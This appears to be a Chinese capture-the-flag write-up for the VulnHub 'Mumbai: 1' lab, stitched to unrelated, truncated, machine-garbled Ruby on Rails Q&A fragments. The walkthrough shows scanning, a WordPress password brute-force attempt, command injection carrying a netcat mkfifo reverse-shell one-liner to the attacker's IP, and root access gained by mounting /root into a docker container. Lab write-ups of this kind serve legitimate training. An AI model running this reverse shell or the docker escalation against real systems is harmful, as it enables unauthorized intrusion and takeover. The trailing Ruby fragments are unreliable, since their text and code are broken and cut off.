作者:jason huawen
名称: Mumbai: 1
地址:
https://www.vulnhub.com/entry/mumbai-1,372/
─(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:ff:33:41 1 60 PCS Systemtechnik GmbH
192.168.56.243 08:00:27:50:a1:19 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.243
──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.243 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-04 02:45 EDT
Nmap scan report for bogon (192.168.56.243)
Host is up (0.00012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.230
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 297 Sep 25 2019 Note
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e3:df:27:19:33:de:d4:2e:5e:33:d9:ab:74:df:38:80 (RSA)
| 256 29:e2:b6:ef:b3:a0:43:7b:8a:a4:4b:f7:e8:41:1f:5b (ECDSA)
|_ 256 34:3a:48:af:b8:68:ab:53:18:62:d2:e4:08:74:e4:c3 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: comingsoonpage.com 1.0.0
|_http-title: Mumbai SEO Services
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open mysql MySQL (unauthorized)
8000/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.0 (Ubuntu)
MAC Address: 08:00:27:50:A1:19 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
先尝试一下mysql是否有弱口令:
─(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ mysql -uroot -p -h 192.168.56.243
Enter password:
ERROR 1130 (HY000): Host '192.168.56.230' is not allowed to connect to this MySQL server
尝试结果表明远程机器无法连接数据库服务器,只允许本地访问。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ ftp 192.168.56.243
Connected to 192.168.56.243.
220 (vsFTPd 3.0.3)
Name (192.168.56.243:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||14114|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 116 4096 Sep 25 2019 .
drwxr-xr-x 2 0 116 4096 Sep 25 2019 ..
-rw-r--r-- 1 0 0 297 Sep 25 2019 Note
226 Directory send OK.
ftp> get Note
local: Note remote: Note
229 Entering Extended Passive Mode (|||55304|)
150 Opening BINARY mode data connection for Note (297 bytes).
100% |****************************************************************************************************************| 297 108.30 KiB/s 00:00 ETA
226 Transfer complete.
297 bytes received in 00:00 (77.90 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||34115|)
550 Permission denied.
对FTP服务的信息收集结果汇总:
目标主机允许FTP匿名访问
将Note下载到Kali Linux本地
匿名用户无法上传文件
ftp服务版本无漏洞可利用。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ cat Note
TODO:
Move these multiple HTTP Servers running to Docker. I hear containers make things inherently
secure - maybe this will shut those security researchers up.
Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want to
rebuild the server again.
- AbsoZed
从Note内容看,应该是有容器的环境,也许可以利用容器进行本地提权。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ gobuster dir -u http://192.168.56.243 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.243
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: html,txt,sh,js,php
[+] Timeout: 10s
===============================================================
2023/04/04 02:52:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10243]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.243/wordpress/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.243/javascript/]
/drupal (Status: 301) [Size: 317] [--> http://192.168.56.243/drupal/]
/SEO (Status: 301) [Size: 314] [--> http://192.168.56.243/SEO/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1320475 / 1323366 (99.78%)
===============================================================
2023/04/04 02:55:29 Finished
===============================================================
Gobuster工具扫描出/drupaly以及/wordpress目录,前者为空目录,/wordpress目录应该是下一步信息收集的重点,利用的工具是wpscan:
──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ wpscan --url http://192.168.56.243/wordpress -e u,p
[i] User(s) Identified:
[+] absozed
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
─$ wpscan --url http://192.168.56.243/wordpress -U absozed -P /usr/share/wordlists/rockyou.txt
虽然wpscan工具扫描出用户名,但是在尝试利用wpscan工具破解密码时但运行十几分钟没有破解出密码。而且wpscan也没有扫描出可利用的插件,因此80端口方向只能作罢。
接下来看8000端口:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ gobuster dir -u http://192.168.56.243:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.js,.txt,.html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.243:8000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: html,php,sh,js,txt
[+] Timeout: 10s
===============================================================
2023/04/04 03:30:30 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 46]
/test.php (Status: 200) [Size: 64]
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ curl http://192.168.56.243:8000/test.php
Please POST a proper query. ex: https://caffeinatedengineers.com
从返回的内容来看,说明请求方法需要修改为POST,可以用burpsuite工具拦截请求,从而修改请求方法,即修改GET为POST
注意不要直接在Burp左侧修改请求头和请求体,修改结果其实是无效的,而是用右边的burpsuite来设置,比如修改Request mehod, 增加request body等等,因为在右侧修改内容,Burpsuite会做自动的字段补充,比如content-type等
也就是说可以利用命令包含漏洞,执行命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f
这样Kali Linux得到目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.243] 40510
which python
/usr/local/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
apiuser@mumbai:~$
apiuser@mumbai:~$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
migrationtest v1 ec8b7840f6aa 3 years ago 216MB
ubuntu 14.04 2c5e00d77a67 3 years ago 188MB
apiuser@mumbai:~$ docker run -it -v /root:/mnt ubuntu
docker run -it -v /root:/mnt ubuntu
Unable to find image 'ubuntu:latest' locally
docker: Error response from daemon: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.io: Temporary failure in name resolution.
See 'docker run --help'.
apiuser@mumbai:~$ docker run -it -v /root:/mnt ubuntu:14.04
docker run -it -v /root:/mnt ubuntu:14.04
root@224ee0f52adc:/# cd /mnt
cd /mnt
root@224ee0f52adc:/mnt# ls -alh
ls -alh
total 68K
drwx------ 6 root root 4.0K Sep 25 2019 .
drwxr-xr-x 1 root root 4.0K Apr 4 07:54 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Sep 24 2019 .cache
drwxr-xr-x 3 root root 4.0K Sep 24 2019 .local
-rw------- 1 root root 74 Sep 24 2019 .mysql_history
drwxr-xr-x 399 1000 1000 12K Sep 24 2019 .npm
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 7 Sep 24 2019 .python_history
drwx------ 2 root root 4.0K Sep 24 2019 .ssh
-rw-r--r-- 1 root root 9.2K Sep 24 2019 .v8flags.6.2.414.50.root.json
-rw-r--r-- 1 root root 174 Sep 24 2019 .wget-hsts
-rw-r--r-- 1 root root 603 Sep 25 2019 proof.txt
root@224ee0f52adc:/mnt# cat proof.txt
cat proof.txt
8""8""8 8""""8 8"""" 8"""88
8 8 8 e e eeeeeee eeeee eeeee e 8 8 8 8
8e 8 8 8 8 8 8 8 8 8 8 8 8 8eeeee 8eeee 8 8
88 8 8 8e 8 8e 8 8 8eee8e 8eee8 8e 88 88 8 8
88 8 8 88 8 88 8 8 88 8 88 8 88 e 88 88 8 8
88 8 8 88ee8 88 8 8 88eee8 88 8 88 8eee88 88eee 8eeee8
By: AbsoZed
Congratulations! Hope you enjoyed the box!
Proof: 4370445fbc9eaa490589b55a8ae4494f
https://caffeinatedengineers.com
root@224ee0f52adc:/mnt#
很好奇,就使用rubyonrails自动化单元测试而言,你们正在做什么?您是否创建了一个脚本来在cron中运行rake作业并将结果邮寄给您?git中的预提交Hook?只是手动调用?我完全理解测试,但想知道在错误发生之前捕获错误的最佳实践是什么。让我们理所当然地认为测试本身是完美无缺的,并且可以正常工作。下一步是什么以确保他们在正确的时间将可能有害的结果传达给您? 最佳答案 不确定您到底想听什么,但是有几个级别的自动代码库控制:在处理某项功能时,您可以使用类似autotest的内容获得关于哪些有效,哪些无效的即时反馈。要确保您的提
我正在编写一个包含C扩展的gem。通常当我写一个gem时,我会遵循TDD的过程,我会写一个失败的规范,然后处理代码直到它通过,等等......在“ext/mygem/mygem.c”中我的C扩展和在gemspec的“扩展”中配置的有效extconf.rb,如何运行我的规范并仍然加载我的C扩展?当我更改C代码时,我需要采取哪些步骤来重新编译代码?这可能是个愚蠢的问题,但是从我的gem的开发源代码树中输入“bundleinstall”不会构建任何native扩展。当我手动运行rubyext/mygem/extconf.rb时,我确实得到了一个Makefile(在整个项目的根目录中),然后当
我有一个围绕一些对象的包装类,我想将这些对象用作散列中的键。包装对象和解包装对象应映射到相同的键。一个简单的例子是这样的:classAattr_reader:xdefinitialize(inner)@inner=innerenddefx;@inner.x;enddef==(other)@inner.x==other.xendenda=A.new(o)#oisjustanyobjectthatallowso.xb=A.new(o)h={a=>5}ph[a]#5ph[b]#nil,shouldbe5ph[o]#nil,shouldbe5我试过==、===、eq?并散列所有无济于事。
我有一些Ruby代码,如下所示:Something.createdo|x|x.foo=barend我想编写一个测试,它使用double代替block参数x,这样我就可以调用:x_double.should_receive(:foo).with("whatever").这可能吗? 最佳答案 specify'something'dox=doublex.should_receive(:foo=).with("whatever")Something.should_receive(:create).and_yield(x)#callthere
Sinatra新手;我正在运行一些rspec测试,但在日志中收到了一堆不需要的噪音。如何消除日志中过多的噪音?我仔细检查了环境是否设置为:test,这意味着记录器级别应设置为WARN而不是DEBUG。spec_helper:require"./app"require"sinatra"require"rspec"require"rack/test"require"database_cleaner"require"factory_girl"set:environment,:testFactoryGirl.definition_file_paths=%w{./factories./test/
我遵循MichaelHartl的“RubyonRails教程:学习Web开发”,并创建了检查用户名和电子邮件长度有效性的测试(名称最多50个字符,电子邮件最多255个字符)。test/helpers/application_helper_test.rb的内容是:require'test_helper'classApplicationHelperTest在运行bundleexecraketest时,所有测试都通过了,但我看到以下消息在最后被标记为错误:ERROR["test_full_title_helper",ApplicationHelperTest,1.820016791]test
我已经构建了一些serverspec代码来在多个主机上运行一组测试。问题是当任何测试失败时,测试会在当前主机停止。即使测试失败,我也希望它继续在所有主机上运行。Rakefile:namespace:specdotask:all=>hosts.map{|h|'spec:'+h.split('.')[0]}hosts.eachdo|host|begindesc"Runserverspecto#{host}"RSpec::Core::RakeTask.new(host)do|t|ENV['TARGET_HOST']=hostt.pattern="spec/cfengine3/*_spec.r
我在app/helpers/sessions_helper.rb中有一个帮助程序文件,其中包含一个方法my_preference,它返回当前登录用户的首选项。我想在集成测试中访问该方法。例如,这样我就可以在测试中使用getuser_path(my_preference)。在其他帖子中,我读到这可以通过在测试文件中包含requiresessions_helper来实现,但我仍然收到错误NameError:undefinedlocalvariableormethod'my_preference'.我做错了什么?require'test_helper'require'sessions_hel
只是想确保我理解了事情。据我目前收集到的信息,Cucumber只是一个“包装器”,或者是一种通过将事物分类为功能和步骤来组织测试的好方法,其中实际的单元测试处于步骤阶段。它允许您根据事物的工作方式组织您的测试。对吗? 最佳答案 有点。它是一种组织测试的方式,但不仅如此。它的行为就像最初的Rails集成测试一样,但更易于使用。这里最大的好处是您的session在整个Scenario中保持透明。关于Cucumber的另一件事是您(应该)从使用您的代码的浏览器或客户端的角度进行测试。如果您愿意,您可以使用步骤来构建对象和设置状态,但通常您
我有:When/^(?:|I)follow"([^"]*)"(?:within"([^"]*)")?$/do|link,selector|with_scope(selector)doclick_link(link)endend我打电话的地方:Background:GivenIamanexistingadminuserWhenIfollow"CLIENTS"我的HTML是这样的:CLIENTS我一直收到这个错误:.F-.F--U-----U(::)failedsteps(::)nolinkwithtitle,idortext'CLIENTS'found(Capybara::Element